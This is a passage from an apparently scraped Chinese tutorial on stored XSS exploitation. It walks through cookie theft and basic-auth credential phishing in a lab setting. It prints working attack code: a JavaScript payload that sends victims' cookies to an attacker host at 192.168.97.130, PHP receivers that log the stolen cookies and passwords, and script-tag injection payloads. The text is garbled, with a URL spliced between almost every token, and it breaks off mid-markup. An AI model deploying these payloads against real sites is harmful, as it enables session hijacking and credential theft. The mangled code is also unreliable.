"qwsn.php"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ //保存到qwsn.phphttps://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ fopenhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$filePathhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "a"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    fwritehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $strhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/fclosehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(3)攻擊者-原理: 攻擊者把payload發佈到留言板或者評論處,當受害者訪問該頁面的時候,就會觸發該xss漏洞,那麼cookie值會通過qwsn參數傳遞給攻擊者遠程服務器上的php_receive.php頁面內,並且保存到同目錄下的qwsn.php內。

(4)受害者-原理: 受害者訪問該留言板或評論頁面,此時會立刻觸發xss漏洞,也就是外鏈加載攻擊者遠程服務器上的xss_attack.js文件,該文件的功能就是把當前用戶的cookie通過qwsn參數傳遞給攻擊者遠程服務器上的xss_receive.php頁面,同時又把該cookie值保存到攻擊者的qwsn.php頁面內。

5、xss漏洞利用示例:盜取COOKIE

(https://blog.csdn.net/qq_45555226/article/details/1)靶機: http://www.webtester.com/xss/xss02.php

(2)攻擊者WEB服務器:

攻擊者IP:https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/IP對應的域名www.https://blog.csdn.net/qq_45555226/article/details/exploit.https://blog.csdn.net/qq_45555226/article/details/com)https://blog.csdn.net/qq_45555226/article/details/攻擊者WEB服務的目錄:https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/xss攻擊者存放js惡意腳本:https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/xss/https://blog.csdn.net/qq_45555226/article/details/xss.https://blog.csdn.net/qq_45555226/article/details/attack.https://blog.csdn.net/qq_45555226/article/details/js攻擊者存放接收cookie的php文件:https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/xss/https://blog.csdn.net/qq_45555226/article/details/xss_receive.https://blog.csdn.net/qq_45555226/article/details/php攻擊者存放cookie的文件:https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168https://blog.csdn.net/qq_45555226/article/details/.97https://blog.csdn.net/qq_45555226/article/details/.https://blog.csdn.net/qq_45555226/article/details/130https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/exp/https://blog.csdn.net/qq_45555226/article/details/xss/https://blog.csdn.net/qq_45555226/article/details/qwsn.https://blog.csdn.net/qq_45555226/article/details/php

(3)惡意腳本文件xss_attack.js,讀取cookie,通過qwsn參數傳入xss_receive.php頁面

xss_attack.js內容:

varhttps://blog.csdn.net/qq_45555226/article/details/ img =https://blog.csdn.net/qq_45555226/article/details/ document.https://blog.csdn.net/qq_45555226/article/details/createElementhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'img'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/width =https://blog.csdn.net/qq_45555226/article/details/ 0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/height =https://blog.csdn.net/qq_45555226/article/details/ 0https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/img.https://blog.csdn.net/qq_45555226/article/details/src =https://blog.csdn.net/qq_45555226/article/details/ 'http://https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168.97.https://blog.csdn.net/qq_45555226/article/details/130/exp/xss/xss_receive.php?qwsn='https://blog.csdn.net/qq_45555226/article/details/+https://blog.csdn.net/qq_45555226/article/details/encodeURIComponenthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/document.https://blog.csdn.net/qq_45555226/article/details/cookie)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/

(4)xss_receive.php讀取傳來的qwsn參數的cookie參數值,並把cookie值寫入到當前目錄下的qwsn.php文件內。

xss_receive.php內容:

<?phphttps://blog.csdn.net/qq_45555226/article/details/    @ini_sethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'display_errors'https://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $strhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ $_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'qwsn'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ //讀取cookiehttps://blog.csdn.net/qq_45555226/article/details/    $filePathhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ "qwsn.php"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details///保存到qwsn.phphttps://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/ =https://blog.csdn.net/qq_45555226/article/details/ fopenhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$filePathhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ "a"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    fwritehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $strhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/fclosehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$handlerhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(5)攻擊者的payload:

payload-https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/1https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"http://https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168.97.https://blog.csdn.net/qq_45555226/article/details/130/exp/xss/xss_attack.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/payload-https://blog.csdn.net/qq_45555226/article/details/2https://blog.csdn.net/qq_45555226/article/details/:可以<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"//https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168.97.https://blog.csdn.net/qq_45555226/article/details/130/exp/xss/xss_attack.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/

(6)利用過程:

第一步:模擬攻擊者把payloadhttps://blog.csdn.net/qq_45555226/article/details/1或payload2發佈到留言板,當其他人訪問該頁面的時候,觸發該xss漏洞,那麼cookie值會通過qwsn參數傳遞給我們php_receive.php頁面內,並且保存到qwsn.php內。

<https://blog.csdn.net/qq_45555226/article/details/script src=https://blog.csdn.net/qq_45555226/article/details/"http://https://blog.csdn.net/qq_45555226/article/details/192.https://blog.csdn.net/qq_45555226/article/details/168.97.https://blog.csdn.net/qq_45555226/article/details/130/exp/xss/xss_attack.js"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/script>https://blog.csdn.net/qq_45555226/article/details/


第二步:模擬受害者,訪問該留言板頁面,此時會立刻觸發xss漏洞,也就是加載攻擊者的xss_attack.js文件,該文件的功能就是把當前用戶的cookie通過qwsn參數傳遞給攻擊者的遠程服務器上的xss_receive.php頁面,該頁面又把改cookie值保存到攻擊者的qwsn.php頁面內。

第三步:攻擊者查看保存到qwsn.php頁面內的cookie

最後:同樣的除瞭payloadhttps://blog.csdn.net/qq_45555226/article/details/1之外,以上的payload2也可以達到相同的效果!!!

6、xss漏洞利用原理:基礎認證釣魚

(https://blog.csdn.net/qq_45555226/article/details/1)攻擊者遠程WEB服務器上的惡意釣魚腳本,fish.php

         背景:當一個留言板或評論頁面存在Xss存儲下漏洞的時候,攻擊者可以通過存入一個payload到該頁面服務器的數據庫中,從而可以讓受害者在訪問該頁面的時候,觸發payload。當然瞭該payload的功能就是外鏈這個存儲在攻擊者遠程服務器上的基礎認證框腳本fish.php。

         功能:彈窗提供一個基礎認證框

<?phphttps://blog.csdn.net/qq_45555226/article/details/error_reportinghttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/// var_dump($_SERVER);https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_USER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ ||https://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_PW'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ {https://blog.csdn.net/qq_45555226/article/details///發送認證框,並給出迷惑性的infohttps://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'Content-type:text/html;charset=utf-8'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"WWW-Authenticate: Basic realm='認證'"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'HTTP/https://blog.csdn.net/qq_45555226/article/details/1.0 40https://blog.csdn.net/qq_45555226/article/details/1 Unauthorized'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    echohttps://blog.csdn.net/qq_45555226/article/details/ 'Authorization Required.'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    exithttps://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/ elsehttps://blog.csdn.net/qq_45555226/article/details/ ifhttps://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_USER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ (https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'PHP_AUTH_PW'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details///將結果發送給搜集信息的後臺,請將這裡的IP地址修改為管理後臺的IPhttps://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"Location: http://攻擊者的遠程WEB服務器/xfish.php?username={https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/PHP_AUTH_USERhttps://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/    &password={https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/PHP_AUTH_PWhttps://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(2)攻擊者遠程WEB服務器上的保存認證結果的文件,xfish.php

         功能:把受害則通過基礎認證框傳來的用戶名和密碼保存到攻擊者遠程服務器上的數據庫中

<?phphttps://blog.csdn.net/qq_45555226/article/details/error_reportinghttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/emptyhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'username'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ !https://blog.csdn.net/qq_45555226/article/details/emptyhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'password'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    $usernamehttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'username'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $passwordhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'password'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $refererhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/""https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $refererhttps://blog.csdn.net/qq_45555226/article/details/.=https://blog.csdn.net/qq_45555226/article/details/$_SERVERhttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'HTTP_REFERER'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $timehttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/datehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/'Y-m-d g:i:s'https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"insert fish(time,username,password,referer)     values('$timehttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$usernamehttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$passwordhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/','$refererhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/')"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $resulthttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/mysqli_queryhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/

(3)攻擊者遠程WEB服務器上的調用保存的認證結果的文件,pkxss_fish_result.php

<?phphttps://blog.csdn.net/qq_45555226/article/details/error_reportinghttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/0https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/config.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/include_oncehttps://blog.csdn.net/qq_45555226/article/details/ '../inc/mysql.inc.php'https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/connecthttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/// 判斷是否登錄,沒有登錄不能訪問https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/!https://blog.csdn.net/qq_45555226/article/details/check_loginhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    headerhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/"location:../pkxss_login.php"https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/ifhttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/issethttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/ &&https://blog.csdn.net/qq_45555226/article/details/ is_numerichttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/{https://blog.csdn.net/qq_45555226/article/details/    $idhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/escapehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $_GEThttps://blog.csdn.net/qq_45555226/article/details/[https://blog.csdn.net/qq_45555226/article/details/'id'https://blog.csdn.net/qq_45555226/article/details/]https://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    $queryhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"delete from fish where id=$idhttps://blog.csdn.net/qq_45555226/article/details/https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/    executehttps://blog.csdn.net/qq_45555226/article/details/(https://blog.csdn.net/qq_45555226/article/details/$linkhttps://blog.csdn.net/qq_45555226/article/details/,https://blog.csdn.net/qq_45555226/article/details/ $queryhttps://blog.csdn.net/qq_45555226/article/details/)https://blog.csdn.net/qq_45555226/article/details/;https://blog.csdn.net/qq_45555226/article/details/}https://blog.csdn.net/qq_45555226/article/details/?https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/html>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/head>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/meta http-https://blog.csdn.net/qq_45555226/article/details/equiv=https://blog.csdn.net/qq_45555226/article/details/"Content-Type"https://blog.csdn.net/qq_45555226/article/details/ content=https://blog.csdn.net/qq_45555226/article/details/"text/html; charset=utf-8"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/title>https://blog.csdn.net/qq_45555226/article/details/釣魚結果<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/title>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/link rel=https://blog.csdn.net/qq_45555226/article/details/"stylesheet"https://blog.csdn.net/qq_45555226/article/details/ type=https://blog.csdn.net/qq_45555226/article/details/"text/css"https://blog.csdn.net/qq_45555226/article/details/ href=https://blog.csdn.net/qq_45555226/article/details/"../antxss.css"https://blog.csdn.net/qq_45555226/article/details/ /https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/head>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/body>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/div id=https://blog.csdn.net/qq_45555226/article/details/"title"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/hhttps://blog.csdn.net/qq_45555226/article/details/1>https://blog.csdn.net/qq_45555226/article/details/pikachu Xss 釣魚結果<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/hhttps://blog.csdn.net/qq_45555226/article/details/1>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/a href=https://blog.csdn.net/qq_45555226/article/details/"../xssmanager.php"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/返回首頁<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/a>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details//https://blog.csdn.net/qq_45555226/article/details/div>https://blog.csdn.net/qq_45555226/article/details/<https://blog.csdn.net/qq_45555226/article/details/div id=https://blog.csdn.net/qq_45555226/article/details/"result"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/    <https://blog.csdn.net/qq_45555226/article/details/table classhttps://blog.csdn.net/qq_45555226/article/details/=https://blog.csdn.net/qq_45555226/article/details/"tb"https://blog.csdn.net/qq_45555226/article/details/ border=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1px"https://blog.csdn.net/qq_45555226/article/details/ cellpadding=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/10"https://blog.csdn.net/qq_45555226/article/details/ cellspacing=https://blog.csdn.net/qq_45555226/article/details/"https://blog.csdn.net/qq_45555226/article/details/1"https://blog.csdn.net/qq_45555226/article/details/ bgcolor=https://blog.csdn.net/qq_45555226/article/details/"#5f9ea0"https://blog.csdn.net/qq_45555226/article/details/>https://blog.csdn.net/qq_45555226/article/details/        <https://blog.csdn.net/qq_45555226/article/details/tr>https://blog.csdn.net/qq_45555226/article/details/            <https://blog.csdn.net/qq_45555226/article/details/td 